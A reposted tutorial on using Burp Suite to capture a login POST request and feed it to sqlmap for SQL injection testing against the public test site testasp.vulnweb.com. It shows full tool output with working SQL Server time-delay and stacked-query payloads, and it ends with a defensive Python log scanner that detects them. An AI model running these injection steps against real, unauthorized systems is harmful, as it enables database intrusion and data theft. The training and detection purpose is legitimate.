
Using Burp Suite to Assist sqlmap with POST Injection Testing

Date: 2015-04-24 20:42:36


Original article: http://www.freebuf.com/tools/2311.html

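When using sqlmap for POST-based injection, the injection often fails because part of the request was left out.

Here is a small trick: use sqlmap together with Burp Suite. POST injection testing done this way is more accurate, and it is also very easy to do.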

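1. Open the target address http://testasp.vulnweb.com/Login.asp in a browser.
2. Configure the Burp proxy (127.0.0.1:8080) to intercept requests.
3. Click the submit button of the login form.
4. As shown in the screenshot below, Burp now intercepts our login POST request.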

[Screenshot: the login POST request intercepted in Burp]

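5. Copy this POST request into a text file (I named it search-test.txt) and put it in the sqlmap directory.
6. Run sqlmap with the following command: ./sqlmap.py -r search-test.txt -p tfUPass. The -r option tells sqlmap to load our POST request from search-test.txt, and -p, which most readers will know, specifies the parameter to test for injection.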

./sqlmap.py -r search-test.txt -p tfUPass

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from search-test.txt
[13:26:52] [WARNING] the testable parameter tfUPass you provided is not into the GET
[13:26:52] [WARNING] the testable parameter tfUPass you provided is not into the Cookie
[13:26:52] [INFO] using /home/testuser/sqlmap/output/testasp.vulnweb.com/session as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter tfUName but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter tfUPass might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter tfUPass
[13:26:55] [INFO] testing AND boolean-based blind - WHERE or HAVING clause
[13:27:02] [INFO] testing MySQL >= 5.0 AND error-based - WHERE or HAVING clause
[13:27:05] [INFO] testing PostgreSQL AND error-based - WHERE or HAVING clause
[13:27:07] [INFO] testing Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
[13:27:10] [INFO] testing Oracle AND error-based - WHERE or HAVING clause (XMLType)
[13:27:12] [INFO] testing MySQL > 5.0.11 stacked queries
[13:27:14] [INFO] testing PostgreSQL > 8.1 stacked queries
[13:27:17] [INFO] testing Microsoft SQL Server/Sybase stacked queries
[13:27:30] [INFO] POST parameter tfUPass is Microsoft SQL Server/Sybase stacked queries injectable
[13:27:30] [INFO] testing MySQL > 5.0.11 AND time-based blind
[13:27:31] [INFO] testing PostgreSQL > 8.1 AND time-based blind
[13:27:31] [INFO] testing Microsoft SQL Server/Sybase time-based blind
[13:27:42] [INFO] POST parameter tfUPass is Microsoft SQL Server/Sybase time-based blind injectable
[13:27:42] [INFO] testing MySQL UNION query (NULL) - 1 to 10 columns
[13:27:48] [INFO] testing Generic UNION query (NULL) - 1 to 10 columns
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application

>
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter tfUPass is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tfUName=test&tfUPass=test; WAITFOR DELAY 0:0:5;-- AND mPfC=mPfC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tfUName=test&tfUPass=test WAITFOR DELAY 0:0:5-- AND wpkc=wpkc
---

[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under /home/testuser/sqlmap/output/testasp.vulnweb.com

[*] shutting down at: 13:28:28
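
Seen from the server side, the run above leaves two traces: SQL tokens such as WAITFOR DELAY in the decoded tfUPass value, and a burst of HTTP 500 responses on /Login.asp. The following is an added example, not part of the original article or of sqlmap; the record layout, client addresses and error threshold are assumptions, and the sample records are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Token patterns modelled on the two payload types in the sqlmap report above.
SQL_PATTERNS = {
    "time-delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked-query": re.compile(r";\s*\w+.*--", re.I),
}

# Constructed records (not real traffic): client IP, path, status, raw POST body.
SAMPLE = [
    ("198.51.100.20", "/Login.asp", 302, "tfUName=alice&tfUPass=s3cret%3Bpw"),
    ("203.0.113.7", "/Login.asp", 500, "tfUName=test&tfUPass=test%27"),
    ("203.0.113.7", "/Login.asp", 500,
     "tfUName=test&tfUPass=test%3B+WAITFOR+DELAY+0%3A0%3A5%3B--+AND+mPfC%3DmPfC"),
    ("203.0.113.7", "/Login.asp", 500,
     "tfUName=test&tfUPass=test+WAITFOR+DELAY+0%3A0%3A5--+AND+wpkc%3Dwpkc"),
]

def scan_body(body):
    """Return {param: [pattern names]} for URL-decoded POST values that match."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        matched = [kind for kind, rx in SQL_PATTERNS.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits

def flag_clients(records, err_threshold=3):
    """Flag clients that send SQL tokens or trigger a burst of HTTP 500s."""
    errors = defaultdict(int)
    reasons = defaultdict(set)
    for ip, path, status, body in records:
        for param, kinds in scan_body(body).items():
            reasons[ip].update(f"{kind} in {param}" for kind in kinds)
        if status == 500:
            errors[(ip, path)] += 1
    for (ip, path), count in errors.items():
        if count >= err_threshold:
            reasons[ip].add(f"{count}x HTTP 500 on {path}")
    return {ip: sorted(found) for ip, found in reasons.items()}

if __name__ == "__main__":
    for ip, found in flag_clients(SAMPLE).items():
        print(ip, "->", "; ".join(found))
```

Because -r replays the headers of the captured browser request, the User-Agent does not identify the tool, which is why this check keys on body content and error bursts instead.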


Original article: http://www.cnblogs.com/LoveJulin/p/4454155.html
